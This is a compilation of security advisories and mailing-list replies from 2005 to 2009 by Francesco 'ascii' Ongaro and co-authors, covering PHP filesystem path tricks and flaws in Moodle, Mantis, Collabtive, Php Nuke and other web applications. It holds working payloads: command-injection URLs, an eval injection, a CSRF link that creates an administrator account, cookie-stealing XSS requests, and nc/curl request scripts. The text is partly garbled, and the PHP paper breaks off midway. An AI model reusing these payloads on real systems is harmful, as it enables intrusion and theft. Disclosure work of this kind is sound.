 Name  PHP filesystem attack vectors
 Systems Affected  PHP and PHP+Suhosin
 Authors   Francesco ascii Ongaro (ascii AT ush DOT it)
   Giovanni evilaliv3 Pellerano (giovanni.pellerano AT
   evilaliv3 DOT org)
 Date  20090207

II)   The bugs in 50 words
III)  PHP filesystem functions path normalization attack
IV)   PHP filesystem functions path normalization attack details
V)PHP filesystem functions path truncation attack
VI)   PHP filesystem functions path truncation attack details
VII)  The facts
VIII) POC and attack code
IX)   Conclusions

I) Introduction

On Apr 07, 2008 I spoke with Kuza55 and Wisec about an attack I found some
time before that was a new attack vector for filesystem functions (fopen,
(include|require)[_once]?, file_(put|get)_contents, etc) for the PHP
language. It was a path normalization issue and I asked them to keep it
secret [4], this was a good idea cause my analisys was mostly
incomplete and erroneous but the idea was good and the bug was real and

Later on Dec 24, 2008 on barbarianbob showed a path
truncation attack against PHP that is partially based on mine attack.
He discovered the bugs indipendently so he deserves full credits for
them and his findings were dissected partially by Pragmatk on [2] and
[3]. Sadly, or luckily, only the surface of these important issues has
been analyzed and that's why we at are releasing this article:
to bring complete light on them and present some additional juice.

II) The bugs in 50 words

As previously indicated there are two different bugs, the first, the one
that I discovered on April 2008 that can be used independently for some
purposes and the second one, discovered by barbarianbob that uses the
first one to archieve a better goal.

Let's see the details.

- PHP filesystem functions path normalization attack

PHP normalizes / and /. in path names allowing for example
/etc/passwd/ or /etc/passwd/. to be succesfully opened as a file.

- PHP filesystem functions path truncation attack

PHP has a path truncation issue (a badly implemented snprintf())
allowing only MAX_PATH chars to be evaluated when actually opening a
file or directory.

III) PHP filesystem functions path normalization attack

Normally one would expect that to open a file its path must be issued


$ php -r 'include(/etc/passwd);' | head -n1


While all of us are aware that some path normalizations are normal:


$ cat /etc//passwd | head -n1
$ cat /etc/./passwd | head -n1


PHP does far more than what we are likely to expect:


php -r 'include(/etc/passwd/);'


As you can see the file is succesfully included (it works with every
single filesystem function of PHP that makes use of _php_stream_fopen()
and similiar functions).

This is also part of the vector discovered by barbarianbob, while he
uses it for different purposes from what I initially thought.

But with vanilla PHP (the official source tree) it will not work and
you'll get an error complaining about the fact that the target is not
a directory. Why? Because barbarianbob, everybody who ran it succesfully,
and me in my initial disclosure [4] were using a patched PHP (for example
Suhosin, both loaded as .so or build-in, Ubuntu PHP, that is patched
with Suhosin, etc).

This is thanks to a deep and extensive testing and observation plus some
code navigation and gdb magery with the help of evilaliv3 and Wisec.

To overcome this limitation we came out with the universal path
normalization vector for PHP that is not a single / but /.. Well
this is the case in which a single char really changes things.


php -r 'include(/etc/passwd/.);'


This doesn't happen under normal circumstances.


$ cat /etc/passwd/.
cat: /etc/passwd/.: Not a directory

$ cat /etc/passwd/
cat: /etc/passwd/: Not a directory


We were already aware of the fact that these neutral chars could be
repeated many times without affecting the result.


php -r 'include(/etc/passwd//);'
php -r 'include(/etc/passwd/./././././.);'


Moodle 1.9.3 Remote Code Execution

2008-12-12 Thread ascii
Moodle 1.9.3 Remote Code Execution

Name  Remote Code Execution in Moodle
Systems Affected  Moodle 1.9.3 and possibly earlier versions
Severity  High
Impact (CVSSv2)   High 7.3/10, vector: (AV:N/AC:L/Au:M/C:P/I:P/A:C)
Authors   Antonio s4tan Parata (s4tan AT ush DOT it)
  Francesco ascii Ongaro (ascii AT ush DOT it)
  Giovanni evilaliv3 Pellerano (evilaliv3 AT
  digitalbullets DOT org)
Date  20081212


From the Moodle web site: Moodle is a course management system (CMS) -
a free, Open Source software package designed using sound pedagogical
principles, to help educators create effective online learning


A Remote Code Execution exists in Moodle 1.9.3.


- Remote Code Execution (RCE) in texed.php (pathname parameter)

A Remote Code Execution (RCE) vulnerability has been found in
filter/tex/texed.php. In order to exploit this vulnerability
register_globals must be enabled as the TeX Notation filter.

All these conditions reduce the impact of the vulnerability, to remark
this fact we have set multiple authentication flag in the cvss2 score).

In texed.php we find the following instructions:


$cmd = tex_filter_get_cmd($pathname, $texexp);
system($cmd, $status);


Where the function tex_filter_get_cmd, defined in lib.php, is the


function tex_filter_get_cmd($pathname, $texexp) {
$texexp = escapeshellarg($texexp);
$executable = tex_filter_get_executable(false);

if ((PHP_OS == WINNT) || (PHP_OS == WIN32) || (PHP_OS ==
Windows)) {
$executable = str_replace(' ', '^ ', $executable);
return $executable ++ -e  \$pathname\ -- $texexp;

} else {
return \$executable\ -e \$pathname\ -- $texexp;


As we can see no check is performed on the $pathname parameter neither
in texed.php neither in the tex_filter_get_cmd function declared in

Seen this it's possible to exploit this vulnerability to execute
arbitrary commands on the target server. The following urls are proof
of concept for Linux and Windows:

On Linux:;ls+-l;echo+;

On Windows:||+dir+||+echo+

This RCE is blind. You'll never see the list dir of the example
because there is no print of the system command output.


Moodle 1.9.3 and possibly earlier versions are vulnerable.


Proper input validation will fix the vulnerabilities. Actually the
vulnerability is fixed in the Dev tree.

Upgrade to latest development version.


Vendor will not release a new version addressing this vulnerability
since moodle has several different issues with register globals and
the vendor decided to resolve them in a different way for the upcoming

At present we are working on changes that will prevent installation when
register globals on. They should be committed later this week. I suppose
we are not going to release 1.9.4 now because register globals issue is
a know problem already.


No CVE at this time.


20080121 Bug discovered
2008 Initial vendor contact (No Response)
20081811 Second vendor contact (No Response)
20081811 Vendor response
20081212 Advisory released (Fix available only in dev tree)


Antonio s4tan Parata, Francesco ascii Ongaro and Giovanni
evilaliv3 Pellerano are credited with the discovery of this

Antonio s4tan Parata
web site:
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it

Francesco ascii Ongaro
web site:
mail: ascii AT ush DOT it

Giovanni evilaliv3 Pellerano
mail: evilaliv3 AT digitalbullets DOT it


Copyright (c) 2008 Francesco ascii Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Collabtive 0.4.8 Multiple Vulnerabilities

2008-11-10 Thread ascii
Collabtive 0.4.8 Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Collabtive
 Systems Affected  Collabtive 0.4.8 and possibly earlier versions
 Severity  High
 Impact (CVSSv2)   High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P)
 Authors   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
   Giovanni evilaliv3 Pellerano (evilaliv3 AT
   digitalbullets DOT org)
 Date  20080925


From the Collabtive web site: Collabtive is collaborative software to
get your projects done!.


Multiple vulnerabilities exist in Collabtive software.



 A) Stored Cross Site Scripting
 B) Forceful browsing authentication bypass
 C) Arbitrary file upload

A) Stored Cross Site Scripting

A stored XSS vulnerability exists in the /admin.php?action=projects

Once the attacker specifies an XSS attack vector, like
scriptalert(0);/script, as the Name property of a project then
an XSS vulnerability occurs because the projects Name fields are
stored and printed without any filtering.

While the cited section poses limits on the Name field when
reflecting the XSS payload, clicking on the edit link
/manageproject.php?action=editformid=projectId results in a page
without limitations on the characters showed thus allowing complete

This vulnerability requires administrator authentication.

CSRF+XSS and timing (JS) can be used to successfully exploit this
vulnerability in an automated manner.

B) Forceful browsing authentication bypass

An authentication bypass vulnerability exists in
/admin.php?action=usersmode=added. Directly pointing to that URL
shows an error, however at the bottom of the page there is a web
form that permits to create new users with full privileges.

With this vulnerability an attacker without any valid credentials can
create a new valid administrator.

Since this vulnerability has been discovered the exploitation
prerequisites changed as detailed below:

- A bug fix in the latest version 0.4.8 now requires globals on in
order to exploit this vulnerability.

- In version 0.4.6 instead the vulnerability is exploitable regardless
the globals settings.

C) Arbitrary file upload

It's possible to upload arbitrary files with arbitrary extensions.
An attacker that has not already gained Administration privileges using
the previously exposed vulnerabilities must be assigned to at least one

To upload a file go to /managefile.php?action=showprojectid=projectId
and add a new file.

If a file with .php extension is uploaded then the mimetype will be
php/plain and the program will change the extension to .txt in order
to prevent exploitation.

This security control can be bypassed changing the mimetype to
text/plain, in this way the application will believe that a normal .txt
file was uploaded and the extension will not be changed.

The uploaded file resides in /files/projectId/filename_$seed.php.

An authenticated attacker will simply see the seed (and the complete
filename) using the web interface and can directly execute it.

In case of unauthenticated attackers the filename must be guessed.
Luckily the make_seed() routine leaks real random proprieties and is
only based on the time. $seed can be easily bruteforced using values
that are likely to match the return derived by the microtime() of the

private function make_seed()
list($usec, $sec) = explode(' ', microtime());
$value = (float) $sec + ((float) $usec * 10);
return $value;

As easily understandable $seed can be guessed in really few tries. The
same vulnerability exists when attaching a file in the Messages

This vulnerability can also be exploited via CSRF.


Collabtive 0.4.8 and possibly earlier versions are vulnerable.


Proper input validation will fix the vulnerabilities.


No fix available.


No CVE at this time.


20080926 Initial vendor contact (No Response)
20081003 Second vendor contact (No Response)
20081010 Third vendor contact
20081010 Vendor response (Fix promised for the end of October)
20081010 Vendor contact to sync disclosure time (No response)
20081110 Advisory released (Fix not available)


Antonio s4tan Parata, Francesco ascii Ongaro and
Giovanni evilaliv3 Pellerano are credited with the discovery of this

Antonio s4tan Parata
web site:
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it

Francesco ascii Ongaro
web site:
mail: ascii AT ush DOT it

Giovanni evilaliv3 Pellerano
mail: evilaliv3 AT digitalbullets DOT org


Copyright (c) 2008 Francesco ascii Ongaro

Permission is granted for the redistribution

Mantis Bug Tracker 1.1.1 Multiple Vulnerabilities

2008-05-20 Thread ascii

Mantis Bug Tracker 1.1.1 Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Mantis
 Systems Affected  Mantis 1.1.1 and possibly earlier versions
 Severity  High
 Impact (CVSSv2)   High 9/10, vector: (AV:N/AC:L/Au:N/C:C/I:P/A:P)
 Authors   Antonio s4tan Parata (s4tan AT ush DOT it)
   Francesco ascii Ongaro (ascii AT ush DOT it)
 Date  20080520


From the Mantis web site: Mantis is a free popular web-based
bug tracking system. It is written in the PHP scripting language and
works with MySQL, MS SQL, and PostgreSQL databases and a webserver..


Multiple vulnerabilities exist in Mantis software (XSS, CSRF, Remote
Code Execution).


 A) XSS Vulnerabilities
return_dynamic_filters.php (filter_target parameter)
 B) CSRF Vulnerabilities
 C) Remote Code Execution Vulnerabilities
adm_config_set.php (value parameter)

A) XSS Vulnerabilities

We have found an XSS vulnerability in return_dynamic_filters.php. In
order to exploit this vulnerability the attacker must be authenticated.
Usually the anonymous user is allowed on typical installation, so the
impact is a bit higher. The following url is a proof of concept:

B) CSRF Vulnerabilities

There is a Cross Site Request Forgery vulnerability in the software. If a
logged in user with administrator privileges clicks on the following url:
ame=aapassword=aapassword_verify=aa[EMAIL PROTECTED]access_lev

a new user 'foo' with administrator privileges is created. The password
of the new user is sent to [EMAIL PROTECTED]

C) Remote Code Execution Vulnerabilities

Finally we present the most critical vulnerability. A Remote Code
Execution vulnerability exists in the software, but it can be exploited
only if the attacker has a valid administrator account, so it could be
ideal if used in conjunction with the previous one. The vulnerability
is in the file adm_config_set.php. On row 80 we have the following

eval( '$t_value = ' . $f_value . ';' );

where the $f_value is defined at row 34 of the same file:

$f_value = gpc_get_string( 'value' );

the parameter $f_value is never validated, so we can exploit this issue
with the following url which executes the phpinfo() function:


Mantis 1.1.1 and possibly earlier versions are vulnerable.


Proper input validation will fix the vulnerabilities.

Upgrade to latest development version 1.2.0a1.


It was a little surprise to find out that somebody issued CVE-2008-2276
during our responsible disclosure time-line.

From an internal email with Glenn Henshaw:


# 8974 : XSS Vulnerability in filters - fixed for 1.1.2
# 8977 : Port 0008974: XSS Vulnerability in filters - fixed for 1.2.0
 and future
 - this issue has been fixed by escaping the data in the error
# 8976 : Remote Code Execution in adm_config - workaround in place in
 - this page is only accessible to registered administrators
# 8980 : Port: Remote Code Execution in adm_config - workaround in
 place in 1.2.0 and beyond
 - this page is only accessible to registered administrators
# 8975 : CSRF Vulnerabilities in user_create
# 8995 : Port: CSRF Vulnerabilities in user_create
 - this has been fixed by ensuring that action pages can only
 be accessed via POST commands.


So CSRF Vulnerabilities in user_create is an our finding. The vendor
fixed by allowing only POST parameters that is obviously a non-fix.

Our response:


This alone isn't enough since forms can be auto-submitted by js that
are irrespective of the same-orgin policy.

Proper remediation should include referer checking (has proved to be
spoofable on the client side in the past so not a bulletproof
technique) and token checking (a random string or an hash generated
when the user requires the frontend, stored serverside - sessions are
okay -, included in the frontend form and sent to and verified by the

These two protections ensure that an action cannot, hopefully, be
CSRFed (at last in absence of an xss vuln that neutralize the same
origin policy again).


Glenn response:


Thanks for the notice. The CSRF patch

WiKID wClient-PHP = 3.0-2 Multiple XSS Vulnerabilities

2008-04-11 Thread ascii

WiKID wClient-PHP = 3.0-2 Multiple XSS Vulnerabilities

 Name  Multiple Vulnerabilities in wClient-PHP
 Systems Affected  wClient-PHP 3.0-2 and earlier versions
 Severity  Medium
 Impact (CVSSv2)   Medium (5/10, vector: AV:N/AC:L/Au:N/C:C/I:N/A:N)
 AuthorFrancesco ascii Ongaro (ascii AT ush DOT it)
   Antonio s4tan Parata (s4tan AT ush DOT it)
 Date  20080411


From the WiKID website: The WiKID Strong Authentication System is a
dual-source, software-based two-factor authentication system designed
to be less expensive and more extensible than hardware tokens.


In the wClient-PHP package PHP_SELF is echoed back to the client
without proper sanitization leading to XSS issues.

WiKID mantainers have released a new version of the software (3.0-3)
that fixes exposed vulnerabilities and can be downloaded from the url:

Users that based their implementations on the code contained in
sample.php are advised to upgrade.


During a review of the wClient-PHP-3.0-1.tar.gz package (an additional
component of WiKID with network client functions) the following
vulnerabilities were identified in the sample code:

file sample.php, line 251: PHP_SELF insecure usage leads to XSS

form action=?php echo $PHP_SELF ? method=POST 

file sample.php, line 269: PHP_SELF insecure usage leads to XSS

form action=?php echo $PHP_SELF ? method=POST 

file sample.php, line 279: PHP_SELF insecure usage leads to XSS

form action=?php echo $PHP_SELF ? method=POST 

file sample.php, line 292: possible PHP_SELF insecure usage leads to XSS

form action=?php echo $PHP_SELF ? method=POST 

This one was not verified since it's not enabled in the version I have
downloaded but probably it's exploitable in the exact same way as
the other ones.

file sample.php, line 306: PHP_SELF insecure usage leads to XSS

form action=?php echo $PHP_SELF ? method=POST 

$PHP_SELF can be exploited by requesting an URL like file.php/XSS.

Note: On recent PHP versions $PHP_SELF should be $_SERVER['PHP_SELF'].

In case of register_globals=On on recent versions where the variable
is undefined it's possible to override it by issuing PHP_SELF with
the wished value in GPC (GET, POST, COOKIE).

On old version of PHP it's possible to drive the value of PHP_SELF by
GLOBALS poisoning [1].

Version 3.0-2 fix $PHP_SELF instances to $_SERVER['PHP_SELF'], users
are strongly advised to do not use this version as it doesn't correctly
fix presented vulnerabilities and is more exploitable than 3.0-1.

An attacker can steal UserID, Passcode, Domain code and Registration
code before they are sent back to the server itself and potentially
poison the navigation of the user and steal other sensitive informations
via social engineering (injecting additional fields in the form or
showing additional functions to the user) abusing user's trust.

Remediation consists in proper escaping the user controlled inputs.



No CVE at this time.


20080320 Bug discovered
20080320 Vendor contacted
20080411 Advisory released


Francesco ascii Ongaro and Antonio s4tan Parata are credited with
the discovery of this vulnerability.

Francesco ascii Ongaro
web site:
mail: ascii AT ush DOT it

Antonio s4tan Parata
web site:
mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it


Copyright (c) 2008 Francesco ascii Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Original Photo Gallery Remote Command Execution

2007-10-02 Thread ascii
Original Photo Gallery Remote Command Execution

 Name  Original Photo Gallery Remote Command Execution
 Systems Affected  Original 0.11.2 version and below
 Severity  High
 AuthorFrancesco `ascii` Ongaro, Antonio `s4tan` Parata
 Date  20070919


Original is a set of scripts to get your digital photos on the web. It
aims to be as simple to maintain as possible.

The systems consist of two parts: a client side script to scale your
images to different sizes, create archives of an album, attach optional
metadata and a php script to render html pages of the picture


It's possible to execute arbitrary code on remote systems which have
installed a vulnerable software version.


The file inc/ contains the following vulnerable statement:

exec($exif_prog \$gallery_dir/$galerie/lq/img-$snimek.jpg\,
$exif_data, $exif_status);.

If PHP is configured with the globals on option, an attacker can
execute arbitrary code doing a direct request to the file and sending
shell commands in the parameter/value $exif_prog.


The request should create a file in the /tmp directory (on Unix systems)
named p0wn3d.txt. If this happens than you have a vulnerable version of
the software (and a really risky PHP setup).

A rapid measurement show that ~10% systems are vulnerable of about
17'000 listed on Google (using the dork: Generated by Original ver).


Upgrade to the new version 0.11.3 witch fix this vulnerability.

Or if unable to upgrade:

1) Disable access to the directory using Limit (vhosts/.htaccess).

2) Disable execution using disable_functions in php.ini.

The result is:

Warning: exec() has been disabled for security reasons in
/home/XXX/inc/ on line 157

3) Deny direct access to the file in the PHP code by checking for a
define or requested url.


The vendor has promptly replied and addressed the problem issuing a
new release.

Original version 0.11.3 is available here:


No CVE at this time.


20070719 Bug discovered
20070725 Vendor contacted
20070927 Vendor reply and fix
20071002 Advisory released


Francesco `ascii` Ongaro and Antonio `s4tan` Parata are credited with
the discovery of this vulnerability.


Copyright (c) 2007 Francesco `ascii` Ongaro

Note: this exploit is DUAL LICENSED,
1. if you'll use it for personal and non-profit purposes you can
   apply GPL v2 and above.

2. In the case you plain to:
   a. use our code in any commercial context
   b. implement this code in your non-GPL application
   c. use this code during a Penetration Test
   d. make any profit from it

  you need to contact me in order to obtain a _commercial license_.

For more informations about Dual Licensing:

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Re: [Full-disclosure] Cross Domain XMLHttpRequest

2007-04-17 Thread ascii
Michal Majchrowicz wrote:
 Due to security reasons many Web Browsers doesn't allow cross
 domain XMLHttpRequests.


hi Michal, personally i don't get your point (to me it seems just
an hybrid implementation using both server side and client side
scripting) but i'm sure you can better explain your intents

from what i saw it asks a php page to make an http query to the foreign
domain and then display back the page contents using js

so i suppose this is not a vulnerability at all, just an implementation
to (??) pass to javascript remote contents fetched using a machine !=
from the client/browser/whenether

anyway your implementation is a bit flawed


if(($_GET['method']==post)  (isset($_GET['vars'])==true))
echo myglobalcallback(\.rawurlencode($tmp).\);;


this is basically a proxy, it can make get/post requests to http
only hosts, saturate the server bandwidth *PLUS* naturally fetch any
local file : )

please correct me if i misunderstood

best regards,
Francesco `ascii` Ongaro

Re: Php Nuke POST XSS on steroids

2007-03-12 Thread ascii
Paul Laudanski wrote:
 I tried both your scripts at a few locations, and all I get back is this

hi Paul, long time from ccc : )

it happens because http headers must be on a single line, it's a
formatting issue (my fault, i used to put a link to a plain text
version but this time i forgot about it), i've just created a txt
version of the advisory available here:

it should be more usable, i dunno when the demos will stop working
on so i've asked wisec to upload this video since
has bandwidth issues

obviously to bypass the anti-CSRF filter you have to mix the XSS with
the import_request_variables() trick (this doesn't work on
because they have globals on, this is why i choose that domain)

consider that import_request_variables() will allows you to do much
more than an XSS, this is just an example advisory on an example product

See you,
Francesco `ascii` Ongaro

Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite

2007-03-10 Thread ascii
Stefan Esser wrote:
 Taking into account that the vulnerability you describe is fixed in
 Hardened-PHP for years and that there is also a protection against this
 in the Suhosin Extension you can be sure that this NOT a new
 vulnerability (and that you are not the first one who found it...)

not being credited is really annoying and i understand your feelings but
it happens, take a look here, this vulnerability was fixed 3, 4 times?

i'm sure i wasn't credited at all but who cares, i just want the bugs
fixed, and i think that this is the spirit of this month

 For the record, the same vulnerability was reported by me on the
 23.10.2004 at 22:05 in a mail to [EMAIL PROTECTED] (before I added the
 protection to Hardened-PHP)
 At that time the PHP developers considered it NOT A VULNERABILITY.

some misunderstanding in the communication between you and php team? it
happens and i'm sad for it but this is not our fault

on 21.10.2004 at 20:12 i called my grandmother but she was sleeping, she
is an old lady and it's normal to fall asleep at that age : )

i think that it's possible that your month of php bugs could have
changed the way php devs look to vulnerabilities (if so the goal is
fully reached) or it could be the full disclosure

i mean: why don't publish something you found in 2004? just post an
advisory of the type i found this, they said NO-NO, this is the bug,
use my products to get protection

 Well now the PHP developers have commited a fix for this to the PHP CVS,
 crediting you instead of the original reporter (me) and as usual the fix
 is only fixing a part of the problem.

umh.. next time publish your findings : ) you will get credit from the
beginning and the bug will be fixed

my feeling is that it's important to fix software, any way is allowed:
if internal disclosure doesn't work i'll post to fd, or post directly
to fd

and while your products are valid and i personally use them my guess is
that it's more important to fix things in php itself as from the
statement you made initiative to improve PHP's security

if there are other things in your products that are not fixed in php why
don't publish them?

 (Hint: long names like HTTP_POST_VARS do exist...)

the just fixed _POST and so on? nice : )

i really appreciate your work with php, keep up with the disclosure!

Francesco 'ascii' Ongaro

ps: add some smiles in your mails or people will get confused about the
tone of your speaking : )

Php Nuke POST XSS on steroids

2007-03-09 Thread ascii
Php Nuke POST XSS on steroids

 Name  Php Nuke POST XSS on steroids
 Systems Affected  PHP =4.0.7 =5.2.1, GLOBALS OFF, Php Nuke 8.0 and
   others (partially verified)
 Severity  Medium
 Authors   Francesco `ascii` Ongaro ([EMAIL PROTECTED])
   Stefano `wisec` di Paola ([EMAIL PROTECTED])
 Date  20070307


Php Nuke is a CMS written in PHP. This advisory is just an example on
how to exploit an XSS on platforms that use anti CSRF techniques with
the import_request_variables() bypass.


An XSS vulnerability exists in the handling of the query post variable
in the Search function of the Downloads module. This is exploitable in
special conditions; you need:

 - PHP =4.0.7 =5.2.1 to use the import_request_variables() trick
 - register_globals off (doesn't work with globals on)
 - Php Nuke 8 and others


Php Nuke 8.0 is vulnerable to an XSS on _POST, you can verify this using
the provided testsuite.

--- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8


POST /modules.php?name=Downloadsd_op=searchquery= HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:
Gecko/20070220 Firefox/
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



cat REQ | nc 80 -vvv

--- 8 --- 8 --- 8 --- 8 ---  --- 8 --- 8 --- 8 --- 8

$ ./testcase | grep tokentoken
DNS fwd/rev mismatch: != [] 80 (http) open

Infact the injection is in the form action:


When you will try to apply CSRF to this bug (eg. you need a gateway page
to send the post query) you'll notice that Php Nuke has a generic piece
of code in mainfile.php that prevents posting with a wrong referrer.

Test this with the following two testsuites:

--- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8


POST /modules.php?name=Downloadsd_op=searchquery= HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:
Gecko/20070220 Firefox/
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

query=img src=evil onerror=alert(document.cookie) /


cat REQ | nc 80 -vvv

--- 8 --- 8 --- 8 --- 8 --- --- 8 --- 8 --- 8 --- 8


POST /modules.php?name=Downloadsd_op=searchquery= HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:
Gecko/20070220 Firefox/
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

query=img src=evil onerror=alert(document.cookie) /


cat REQ | nc 80 -vvv

--- 8 --- 8 --- 8 --- 8 ---  --- 8 --- 8 --- 8 --- 8

In the first case the attack will succeed cause the referrer matches, in
the second the anti-off-domain-post-check will block your attempt and
you'll get a message like: Posting from another server not allowed!

It seems that other versions have this check too.

--- 8 --- 8 --- 8 --- 8 ---  --- 8 --- 8 --- 8 --- 8

for i in `cat urls.txt`; do
echo $i; curl -s http://$1/modules.php?name=Downloadsd_op=search; \
-d 'query=asdquery=tokenimg src=wrong
onerror=alert(document.cookie) /' \
-e -H User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US;
rv: Gecko/20061208 Firefox/;
done; echo
Posting from another server not allowed!
Posting from another server not allowed!
Posting from another server not allowed!
Posting from another server not allowed!
Posting from another server not allowed!

--- 8 --- 8 --- 8 --- 8 ---  --- 8 --- 8 --- 8 --- 8

The initial part

Re: WordPress Search Function SQL-Injection

2007-02-27 Thread ascii
Justin Frydman - Thinkweb Media wrote:
 Can't replicate this in 2.0.7. Is this only for the 2.1.x branch then?

i have the same feeling

tested on multiple wp instances and can't reproduce on = 2.0.1 = 2.0.7

regards, Francesco 'ascii' Ongaro

Re: Universal XSS with PDF files: highly dangerous

2007-01-03 Thread ascii
 Sorry about that but that's wrong. All the credits have to go to
 Stefano Di Paola and Giorgio Fedon. They presented that stuff at the
 23C3 in Berlin.

the original paper is located here

probably Stefano and Giorgio will post something on their site (!hey i'm waiting too stefano : D)

the technique exposed is really really neat but was only one of that
has been presented at ccc in that talk (UXSS was used as an attack
vector to inject JS to wrap/tamper xmlhttprequest and if the users
had a proxy on his side http response splitting was used in conjunction
to some keepalive bugs to tilt the browser cache to cause cross domain
scripting, all this was autoinjecting)

yeah it needs some conditions (a proxy with keepalive) but this is a
bomb itself : )

from the pdf: Ajax Security, Universal Cross Site Scripting, Code
Injection, Cache Poisoning, Prototype Hijacking, Auto Injecting Cross
Domain Scripting

anyway i expect to see something like an advisory/paper posted somewhere
soon from the wisec staff because it's obvious that the ccc pdf isn't
enough to metabolize all that stuff

Francesco 'ascii' Ongaro

ps: flash 8 is fixed : )

Milkeyway Multiple Vulnerabilities

2006-03-16 Thread ascii
Milkeyway Captive Portal Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in Milkeyway Captive Portal
 Systems Affected  WebCalendar (any version, verified on 0.1 and 0.1.1)
 Severity  Medium Risk
 AuthorFrancesco aScii Ongaro (ascii at katamail . com)
 Date  20060316


Milkeyway is a software for the management and administration of
internet access within public structures and frameworks, where
the service supplying must be submitted to a scrupulous inspection.


Nearly all SQL queries are vulnerable to SQL injection vulnerabilities.
There are also some XSS vulnerabilities.


Since there are 28 detected different vulnerabilities only an
abstract will be included in this mail, please refer to the complete
advisory aviable here:

1) LOGIN PAGE authenticate() SQL INJECTION
2) add_userIp() SQL INJECTION
3) updateTimeStamp() SQL INJECTION
5) delete_user() SQL INJECTION
6) authuser.php MODIFY USER modify_user() SQL INJECTION
7) authuser.php MULTIPLE XSS
8) authuser.php EDIT SQL INJECTION
10) releaseUser() SQL INJECTION
12) authgroup.php ADD GROUP SQL INJECTION
13) add_team() SQL INJECTION
15) delete_team() SQL INJECTION
17) modify_team() SQL INJECTION
19) userstatistics.php ADD USER SQL INJECTION
20) userstatistics.php DELETE USER SQL INJECTION
21) userstatistics.php MODIFY USER SQL INJECTION
22) userstatistics.php EDIT USER SQL INJECTION
23) userstatistics.php MULTIPLE XSS
24) userstatistics.php $_GET['username'] SQL INJECTION 1
25) userstatistics.php $_GET['username'] SQL INJECTION 2
26) chgpwd.php SQL INJECTION 1
27) chgpwd.php SQL INJECTION 2
28) logout.php SQL INJECTION


Milkeyway 0.1 and 0.1.1 are vulnerable.


Input validation will fix the vulnerability.
Magic quotes ON will protect you against most of these injections
except chapter 11 (authuser.php ORDERING SQL INJECTION) where the
input has no single or double quotes around, making magic quotes

11) SQL is injectable by $_GET['filter']

 in authuser.php -
$orderingFilter = $_GET['filter'];
if ($orderingFilter == '') $orderBy =order by uname ASC ;
else $orderBy =order by .$orderingFilter. .$direction;
$result = mysql_query(SELECT * FROM authuser .$orderBy );


Vendor has been contacted.


No CVE at this time.


20060301 Bug discovered
20060316 Vendor contacted
20060316 Advisory released


ascii is credited with the discovery of this vulnerability.


Copyright (c) 2005 Francesco aScii Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

Re: [KAPDA::#16] - SMF SQL Injection

2005-12-12 Thread ascii

I'm a developer from over at simplemachines and 

 I do not see how this can pose an exploit?

/* tabs are evil */
if (!is_numeric($_REQUEST['start'])) {

 $request = db_query(SELECT COUNT(ID_MEMBER)
  FROM {$db_prefix}members
  WHERE LOWER(SUBSTRING(realName, 1, 1))  '.
  substr(strtolower($_REQUEST['start']), 0, 1)
  .' AND is_activated = 1, __FILE__, __LINE__);

 list ($_REQUEST['start']) = mysql_fetch_row($request);

me too, this piece of code isn't exploitable

at last you can inject a ' that will issue a
php error (path disclosure, error log filling
but not an usable sql injection)

The code is entered at this point:
if (!is_numeric($_REQUEST['start']))

i would prefer ctype_digit or preg_match [09]
cause is_numeric accept also hex, signed and

substr(strtolower($_REQUEST['start']), 0, 1)
I simply cannot see how you could possibly 

 exploit SQL from this?

it's impossible imho, but don't relay on magic quotes
